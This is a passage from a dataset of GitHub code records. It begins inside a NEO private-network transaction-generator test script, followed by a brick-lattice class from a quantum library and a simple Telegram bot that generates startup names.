else:\n            break\n\n    bc_height = Blockchain.Default().Height\n    logger.info(\"Synchronized. Height %s. Now open wallet:\" % bc_height)\n    txsNeo = []\n    txsGas = []\n    hashes = []\n\n    try:\n        wallet = UserWallet.Open(MASTER_WALLET_PATH, to_aes_key(MASTER_WALLET_PWD))\n        loop = task.LoopingCall(wallet.ProcessBlocks)\n        loop.start(.5)\n\n        logger.info(\"Wallet opened\")\n\n        wallet_db = read_wallet_db()\n\n        sleep(5)\n        # In this block we transfer NEO assets from master wallet to generated wallets\n        for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n            pre_tx = construct_send_many(wallet, BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, 'NEO', str(PREMADE_NEO))\n            funds_source_script_hash = wallet.ToScriptHash(wallet.Addresses[0])\n            tx = process_transaction(wallet, contract_tx=pre_tx[0], scripthash_from=funds_source_script_hash,\n                                     scripthash_change=pre_tx[2], fee=pre_tx[3], owners=pre_tx[4],\n                                     user_tx_attributes=pre_tx[5])\n            if tx is None:\n                continue\n            tx_hash = tx.Hash.ToString()\n            txsNeo.append(tx_hash)\n            while True:\n                # Try to find transaction in blockchain\n                sleep(0.5)\n                _tx, height = Blockchain.Default().GetTransaction(tx_hash)\n                if height > 0:\n                    break\n                sleep(1)\n\n        # In this block we transfer GAS assets from master wallet to generated wallets\n        for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n            pre_tx = construct_send_many(wallet, BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, 'GAS', str(PREMADE_GAS))\n            funds_source_script_hash = wallet.ToScriptHash(wallet.Addresses[0])\n            tx = process_transaction(wallet, contract_tx=pre_tx[0], scripthash_from=funds_source_script_hash,\n                                     scripthash_change=pre_tx[2], fee=pre_tx[3], owners=pre_tx[4],\n                                     user_tx_attributes=pre_tx[5])\n            if tx is None:\n                continue\n            tx_hash = tx.Hash.ToString()\n            txsGas.append(tx_hash)\n            while True:\n                # Try to find transaction in blockchain\n                sleep(0.5)\n                _tx, height = Blockchain.Default().GetTransaction(tx_hash)\n                if height > 0:\n                    break\n                sleep(1)\n\n        loop.stop()\n        wallet.Close()\n        logger.info(\"Wallet closed\")\n        sleep(2)\n        logger.info(\"Generating raw transactions\")\n\n        # In this block we generate raw transactions\n        for i in range(int(TOTAL_AMOUNT/BLOCK_AMOUNT)):\n            hashes += construct_raw_many(BLOCK_AMOUNT, i*BLOCK_AMOUNT, wallet_db, txsNeo[i], txsGas[i])\n\n        write_raw_db(hashes, TX_FILE)\n\n\n    except Exception as ex:\n        logger.info(ex)\n        traceback.print_stack()\n        traceback.print_exc()\n        reactor.stop()\n        return\n\n    # After main_routine we stop the application\n    reactor.stop()\n    return\n\n\ndef main():\n    # Parse args\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-n\", help=\"total amount of transactions\", type=int)\n    parser.add_argument(\"--walletneo\", help=\"premade NEO in wallet\", type=int)\n    parser.add_argument(\"--walletgas\", help=\"premade GAS in wallet\", type=int)\n    parser.add_argument(\"--txneo\", help=\"amount of sending NEO\", type=int)\n    parser.add_argument(\"--txfee\", help=\"tx fee\", type=float)\n    parser.add_argument(\"-f\", help=\"file to save raw transactions\", type=str)\n    args = parser.parse_args()\n\n    global TOTAL_AMOUNT\n    global PREMADE_GAS\n    global PREMADE_NEO\n    global TX_NEO\n    global TX_GAS\n    global TX_FILE\n\n    if args.n:\n        TOTAL_AMOUNT = args.n\n    if args.walletgas:\n        PREMADE_GAS = args.walletgas\n    if args.walletneo:\n        PREMADE_NEO = args.walletneo\n    if args.txneo:\n        TX_NEO = args.txneo\n    if args.txfee:\n        TX_GAS = PREMADE_GAS - args.txfee  # TX_GAS is what create_raw_transaction reads, so the implicit fee becomes args.txfee\n    if args.f:\n        TX_FILE = args.f\n\n    # Use PrivNet\n    settings.setup_privnet()\n\n    # Setup the blockchain\n    blockchain = LevelDBBlockchain(settings.chain_leveldb_path)\n
Blockchain.RegisterBlockchain(blockchain)\n dbloop = task.LoopingCall(Blockchain.Default().PersistBlocks)\n dbloop.start(.5)\n NodeLeader.Instance().Start()\n\n d = threading.Thread(target=main_routine)\n d.setDaemon(True)\n d.start()\n\n # Awaiting exit here\n reactor.run()\n logger.info(\"Shutting down.\")\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "nspcc-dev/neo-test-flow", "sub_path": "scripts/tx-gen.py", "file_name": "tx-gen.py", "file_ext": "py", "file_size_in_byte": 12929, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "neo.Core.TX.Transaction.TXFeeError", "line_number": 64, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 78, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 78, "usage_type": "name"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttribute", "line_number": 98, "usage_type": "call"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttributeUsage.Script", "line_number": 98, "usage_type": "attribute"}, {"api_name": "neo.Core.TX.TransactionAttribute.TransactionAttributeUsage", "line_number": 98, "usage_type": "name"}, {"api_name": "neo.SmartContract.ContractParameterContext.ContractParametersContext", "line_number": 104, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader.Instance", "line_number": 109, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader", "line_number": 109, "usage_type": "name"}, {"api_name": "traceback.print_stack", "line_number": 125, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 126, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 131, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 131, "usage_type": "name"}, {"api_name": "neo.Prompt.Utils.get_asset_id", "line_number": 135, "usage_type": "call"}, {"api_name": "neo.Prompt.Utils.lookup_addr_str", "line_number": 137, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 139, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 139, "usage_type": "name"}, {"api_name": "neo.Prompt.Utils.get_asset_amount", "line_number": 141, "usage_type": "call"}, {"api_name": "logzero.logger.debug", "line_number": 143, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 143, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 145, "usage_type": "call"}, {"api_name": "neo.Core.TX.Transaction.ContractTransaction", "line_number": 150, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.Zero", "line_number": 156, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 156, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.SystemCoin", "line_number": 162, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 162, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.SystemShare", "line_number": 163, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 163, "usage_type": "name"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet.Open", "line_number": 166, "usage_type": "call"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet", "line_number": 166, "usage_type": "name"}, {"api_name": "neo.Wallets.utils.to_aes_key", "line_number": 166, "usage_type": "call"}, 
{"api_name": "neo.Core.TX.Transaction.ContractTransaction", "line_number": 171, "usage_type": "call"}, {"api_name": "neo.Core.CoinReference.CoinReference", "line_number": 175, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256.ParseString", "line_number": 175, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256", "line_number": 175, "usage_type": "name"}, {"api_name": "neo.Core.CoinReference.CoinReference", "line_number": 176, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256.ParseString", "line_number": 176, "usage_type": "call"}, {"api_name": "neocore.UInt256.UInt256", "line_number": 176, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 180, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 180, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 180, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 181, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 181, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 181, "usage_type": "name"}, {"api_name": "neo.Core.TX.Transaction.TransactionOutput", "line_number": 182, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8.FromDecimal", "line_number": 182, "usage_type": "call"}, {"api_name": "neocore.Fixed8.Fixed8", "line_number": 182, "usage_type": "name"}, {"api_name": "neo.SmartContract.ContractParameterContext.ContractParametersContext", "line_number": 186, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 203, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 203, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 214, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 214, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 215, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 215, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 215, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 215, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 216, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 220, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 220, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 221, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 221, "usage_type": "name"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet.Open", "line_number": 227, "usage_type": "call"}, {"api_name": "neo.Implementations.Wallets.peewee.UserWallet.UserWallet", "line_number": 227, "usage_type": "name"}, {"api_name": "neo.Wallets.utils.to_aes_key", "line_number": 227, "usage_type": "call"}, {"api_name": "twisted.internet.task.LoopingCall", "line_number": 228, "usage_type": "call"}, {"api_name": "twisted.internet.task", "line_number": 228, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 231, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 231, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 235, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 249, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", 
"line_number": 250, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 250, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 253, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 268, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 269, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 269, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 272, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 276, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 276, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 277, "usage_type": "call"}, {"api_name": "logzero.logger.info", "line_number": 278, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 278, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 288, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 288, "usage_type": "name"}, {"api_name": "traceback.print_stack", "line_number": 289, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 290, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.stop", "line_number": 291, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 291, "usage_type": "name"}, {"api_name": "twisted.internet.reactor.stop", "line_number": 295, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 295, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 301, "usage_type": "call"}, {"api_name": "neo.Settings.settings.setup_privnet", "line_number": 331, "usage_type": "call"}, {"api_name": "neo.Settings.settings", "line_number": 331, "usage_type": "name"}, {"api_name": "neo.Implementations.Blockchains.LevelDB.LevelDBBlockchain.LevelDBBlockchain", "line_number": 334, "usage_type": "call"}, {"api_name": "neo.Settings.settings.chain_leveldb_path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "neo.Settings.settings", "line_number": 334, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.RegisterBlockchain", "line_number": 335, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 335, "usage_type": "name"}, {"api_name": "twisted.internet.task.LoopingCall", "line_number": 336, "usage_type": "call"}, {"api_name": "twisted.internet.task", "line_number": 336, "usage_type": "name"}, {"api_name": "neo.Core.Blockchain.Blockchain.Default", "line_number": 336, "usage_type": "call"}, {"api_name": "neo.Core.Blockchain.Blockchain", "line_number": 336, "usage_type": "name"}, {"api_name": "neo.Network.NodeLeader.NodeLeader.Instance", "line_number": 338, "usage_type": "call"}, {"api_name": "neo.Network.NodeLeader.NodeLeader", "line_number": 338, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 340, "usage_type": "call"}, {"api_name": "twisted.internet.reactor.run", "line_number": 345, "usage_type": "call"}, {"api_name": "twisted.internet.reactor", "line_number": 345, "usage_type": "name"}, {"api_name": "logzero.logger.info", "line_number": 346, "usage_type": "call"}, {"api_name": "logzero.logger", "line_number": 346, "usage_type": "name"}]}
+{"seq_id": "75087011606", "text": "import math\nimport numpy as np\nfrom typing import Sequence\nfrom qib.lattice import AbstractLattice\nfrom qib.lattice.shifted_lattice_convention import ShiftedLatticeConvention\n\n\nclass BrickLattice(AbstractLattice):\n \"\"\"\n Brick lattice.\n The lattice has n full rectangles per row and m full rectangles per column.\n \"\"\"\n def __init__(self, shape: Sequence[int], pbc=False, delete=False, convention: ShiftedLatticeConvention=ShiftedLatticeConvention.COLS_SHIFTED_UP):\n if len(shape) != 2:\n raise NotImplementedError(\"Brick lattices require 2 dimensions, {len(shape)} were given\")\n self.shape = tuple(shape)\n self.convention = convention\n self.shape_square = self._shape_square\n self.nsites_square = self._nsites_square\n self.delete = delete\n if pbc is True:\n # TODO: add pbc in adjacency matrix\n raise NotImplementedError(\"The brick lattice doesn't hold periodic boundary conditions yet\")\n self.pbc = pbc\n\n @property\n def nsites(self) -> int:\n \"\"\"\n Number of lattice sites.\n If delete=False, it includes the 2 extra points if they are needed.\n \"\"\"\n if not self.delete and ((self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1) or (self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1)):\n return 2*self.shape[0]*self.shape[1] + 2*(self.shape[0]+self.shape[1]) + 2\n else:\n return 2*self.shape[0]*self.shape[1] + 2*(self.shape[0]+self.shape[1])\n\n @property\n def ndim(self) -> int:\n \"\"\"\n Number of spatial dimensions.\n \"\"\"\n return len(self.shape)\n\n @property\n def _shape_square(self) -> tuple:\n \"\"\"\n Shape of the equivalent square lattice.\n Includes the 2 extra points.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP:\n if self.shape[1]>1:\n nrows_square = 2*self.shape[0]+2\n else:\n nrows_square = 2*self.shape[0]+1\n ncols_square = self.shape[1]+1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT:\n if self.shape[0]>1:\n ncols_square = 2*self.shape[1]+2\n else:\n ncols_square = 2*self.shape[1]+1\n nrows_square = self.shape[0]+1\n return (nrows_square,ncols_square)\n\n @property\n def _nsites_square(self) -> int:\n \"\"\"\n Number of lattice sites in the equivalent square lattice.\n Includes the 2 extra points.\n \"\"\"\n return self.shape_square[0]*self.shape_square[1]\n\n def adjacency_matrix(self):\n \"\"\"\n Construct the adjacency matrix, indicating nearest neighbors.\n Brick lattice embedded in a square grid::\n\n _ _ _\n | |_| |_| |\n |_| |_| |_|\n . 
|_| |_| .\n\n If delete == True, the 2 extra points are eliminated from the adjacency matrix.\n Otherwise, they are just disconnected (corresponding rows and columns are 0)\n \"\"\"\n # An equivalent square graph is built.\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP:\n d_square = 0\n parity_shift_condition = (self.shape[1]%2 == 1)\n\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT:\n d_square = 1\n parity_shift_condition = (self.shape[0]>1)\n\n adj = np.zeros((self.nsites_square, self.nsites_square), dtype=int)\n idx = np.arange(self.nsites_square).reshape(self.shape_square)\n # the y axis for COLS_SHIFTED_UP and x axis for ROWS_SHIFTED_LEFT are treated like the square graph case.\n # the other axis only has half of the connections.\n for d in range(self.ndim):\n for s in [-1, 1]:\n ids = np.roll(idx, s, axis=d)\n # single out axis `d`\n seld = (math.prod(self.shape_square[:d]), self.shape_square[d], math.prod(self.shape_square[d+1:]))\n idx_cut = idx.reshape(seld)\n ids_cut = ids.reshape(seld)\n if s == 1:\n idx_cut = idx_cut[:, 1:, :]\n ids_cut = ids_cut[:, 1:, :]\n elif s == -1:\n idx_cut = idx_cut[:, :-1, :]\n ids_cut = ids_cut[:, :-1, :]\n else:\n assert False\n if d == d_square:\n for (i, j) in zip(idx_cut.reshape(-1), ids_cut.reshape(-1)):\n adj[i, j] = 1\n else:\n for (i, j) in zip(idx_cut.reshape(-1), ids_cut.reshape(-1)):\n if parity_shift_condition:\n if (s == -1 and (i+i//self.shape_square[1])%2 == 0) or (s == 1 and (i+i//self.shape_square[1])%2 == 1):\n adj[i, j] = 1\n else:\n if (s == -1 and i%2 == 0) or (s == 1 and i%2 == 1):\n adj[i, j] = 1\n if self.delete:\n adj = self._delete_extra_points(adj)\n else:\n adj = self._disconnect_extra_points(adj)\n return adj\n\n def _delete_extra_points(self, adj):\n \"\"\"\n Deletes the 2 extra points from the adjacency matrix.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1:\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1], 0)\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1], 1)\n if self.shape_square[1]%2 == 0:\n adj = np.delete(adj, -1, 0)\n adj = np.delete(adj, -1, 1)\n else:\n adj = np.delete(adj, self.shape_square[1]-1, 0)\n adj = np.delete(adj, self.shape_square[1]-1, 1)\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1:\n adj = np.delete(adj, self.shape_square[1]-1, 0)\n adj = np.delete(adj, self.shape_square[1]-1, 1)\n if self.shape_square[0]%2 == 1:\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1]-1, 0)\n adj = np.delete(adj, (self.shape_square[0]-1)*self.shape_square[1]-1, 1)\n else:\n adj = np.delete(adj, -1, 0)\n adj = np.delete(adj, -1, 1)\n\n return adj\n\n def _disconnect_extra_points(self, adj):\n \"\"\"\n Disconnects the 2 extra points from the adjacency matrix.\n They are still counted in, but are not connected anymore to the rest of the lattice.\n \"\"\"\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1]>1:\n adj[(self.shape_square[0]-1)*self.shape_square[1], :] = 0\n adj[:, (self.shape_square[0]-1)*self.shape_square[1]] = 0\n if self.shape_square[1]%2 == 0:\n adj[-1, :] = 0\n adj[:, -1] = 0\n else:\n adj[self.shape_square[1]-1, :] = 0\n adj[:, self.shape_square[1]-1] = 0\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0]>1:\n adj[self.shape_square[1]-1, :] = 0\n adj[:, self.shape_square[1]-1] = 0\n if self.shape_square[0]%2 == 1:\n 
adj[(self.shape_square[0]-1)*self.shape_square[1], :] = 0\n adj[:, (self.shape_square[0]-1)*self.shape_square[1]] = 0\n else:\n adj[-1, :] = 0\n adj[:, -1] = 0\n\n return adj\n\n def index_to_coord(self, i: int) -> tuple:\n \"\"\"\n Map linear index to the equivalent square lattice coordinate.\n If self.delete=True the two extra points of the equivalent square lattice are not counted in.\n \"\"\"\n shift = 0\n if self.delete:\n assert i < self.nsites\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1] > 1:\n if i >= self.shape_square[1]-1 and self.shape[1]%2 == 0:\n shift += 1\n if i >= (self.shape_square[0]-1)*self.shape_square[1]-shift:\n shift += 1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0] > 1:\n if i >= self.shape_square[1]-1:\n shift += 1\n if i >= (self.shape_square[0]-1)*self.shape_square[1]-shift and self.shape[0]%2 == 0:\n shift += 1\n return np.unravel_index((i+shift), self.shape_square)\n\n def coord_to_index(self, c) -> int:\n \"\"\"\n Map lattice coordinate to the equivalent square lattice coordinate.\n If delete=True the two extra points of the equivalent square lattice are not counted in.\n \"\"\"\n shift = 0\n if self.delete:\n if self.convention == ShiftedLatticeConvention.COLS_SHIFTED_UP and self.shape[1] > 1:\n # even and odd columns specific cases\n if self.shape[1]%2 == 0:\n if c[0] == 0 and c[1] == self.shape_square[1]-1:\n return None\n elif c[0] > 0:\n shift += 1\n else:\n if c[0] == self.shape_square[0]-1 and c[1] == self.shape_square[1]-1:\n return None\n # common shift for even and odd cases\n if c[0] == self.shape_square[0]-1:\n if c[1] == 0:\n return None\n else:\n shift += 1\n if self.convention == ShiftedLatticeConvention.ROWS_SHIFTED_LEFT and self.shape[0] > 1:\n # even and odd columns specific cases\n if self.shape[0]%2 == 0:\n if c[0] == self.shape_square[0]-1:\n if c[1] == 0:\n return None\n else:\n shift += 1\n else:\n if c[0] == self.shape_square[0]-1 and c[1] == self.shape_square[1]-1:\n return None\n # common shift for even and odd cases\n if c[0] == 0:\n if c[1] == self.shape_square[1]-1:\n return None\n else:\n shift += 1\n return int(np.ravel_multi_index(c, self.shape_square)) - shift\n", "repo_name": "qc-tum/qib", "sub_path": "src/qib/lattice/brick_lattice.py", "file_name": "brick_lattice.py", "file_ext": "py", "file_size_in_byte": 10550, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qib.lattice.AbstractLattice", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 13, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 13, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 13, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 32, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 32, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 32, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 50, "usage_type": "attribute"}, {"api_name": 
"qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 50, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 56, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 56, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 86, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 86, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 90, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 90, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 100, "usage_type": "call"}, {"api_name": "math.prod", "line_number": 102, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 134, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 134, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 142, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 143, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 143, "usage_type": "name"}, {"api_name": "numpy.delete", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 151, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 160, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 160, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 169, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 169, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 189, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 189, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 194, "usage_type": "attribute"}, {"api_name": 
"qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.unravel_index", "line_number": 199, "usage_type": "call"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.COLS_SHIFTED_UP", "line_number": 208, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 208, "usage_type": "name"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention.ROWS_SHIFTED_LEFT", "line_number": 224, "usage_type": "attribute"}, {"api_name": "qib.lattice.shifted_lattice_convention.ShiftedLatticeConvention", "line_number": 224, "usage_type": "name"}, {"api_name": "numpy.ravel_multi_index", "line_number": 241, "usage_type": "call"}]}
+{"seq_id": "34699491499", "text": "import telebot\nfrom generator import Generator\n\ngenerator = Generator.load('my_model')\n\nbot = telebot.TeleBot(\"TOKEN\")\n\nmarkup = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\ngen_button = telebot.types.KeyboardButton('Generate')\nmarkup.add(gen_button)\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n start_message = 'Hi there!\\nPress \\\"Generate\\\" button to get a startup name.'\n bot.send_message(message.chat.id, start_message, reply_markup=markup)\n\n\n@bot.message_handler(commands=['help'])\ndef send_help(message):\n help_message = 'Press \\\"Generate\\\" button to get a startup name.'\n bot.send_message(message.chat.id, help_message)\n\n\n@bot.message_handler(func=lambda message: message.text == 'Generate')\ndef answer_message(message):\n bot.send_message(message.chat.id, generator.simulate(1))\n\n\nbot.polling()\n", "repo_name": "egor-sergeev/SPbU-homework", "sub_path": "Semester_5/computer_networks/bot/startupNameGeneratorBot.py", "file_name": "startupNameGeneratorBot.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "generator.Generator.load", "line_number": 4, "usage_type": "call"}, {"api_name": "generator.Generator", "line_number": 4, "usage_type": "name"}, {"api_name": "telebot.TeleBot", "line_number": 6, "usage_type": "call"}, {"api_name": "telebot.types.ReplyKeyboardMarkup", "line_number": 8, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 8, "usage_type": "attribute"}, {"api_name": "telebot.types.KeyboardButton", "line_number": 9, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 9, "usage_type": "attribute"}, {"api_name": "generator.simulate", "line_number": 27, "usage_type": "call"}]}
